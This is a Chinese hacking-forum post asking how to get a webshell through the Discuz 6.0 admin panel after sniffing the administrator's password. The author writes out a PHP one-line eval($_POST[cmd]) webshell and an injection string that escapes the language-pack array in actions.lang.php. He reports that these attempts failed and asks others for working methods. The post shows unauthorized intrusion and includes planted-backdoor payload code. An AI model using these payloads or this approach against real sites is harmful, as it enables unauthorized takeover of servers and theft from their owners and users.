- 帖子
- 251
- 积分
- 667
- 威望
- 1075
- 金钱
- 829
- 在线时间
- 2 小时
|
[讨论]关于discuz6.0后台获取shell的方法
[讨论]关于discuz6.0后台获取shell的方法
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
议题作者:NEVErSayLovE
如题, 通过嗅探获得了admin的密码,进了后台,在获取shell这一步出了问题.
按照一般的说法是在模版管理里编辑语言包actions.随便找一行写入"eval($_POST[cmd]); "(没有引号).提交就写入templates/default/actions.lang.php了,但是我有客户端连接的时候没有反应.
排除一句话和url写错.
在网上找了下,说法是在最后一行-即游客一行写入
复制内容到剪贴板
代码:
游客\');?>
<?php eval($_POST[cmd]);?><?$languagex= array (
\'g\'=>\'error
依然无果.再次编辑时可以看到游客后面的那个"\"被去掉了.
请问一下大家在discuz6.0后台一般都是怎样得shell的啊,还望不吝赐教.
帖子38 精华2 积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25 查看详细资料引用 报告 回复 TOP 赚更多的钱
neversaylove
晶莹剔透§烈日灼然 |
|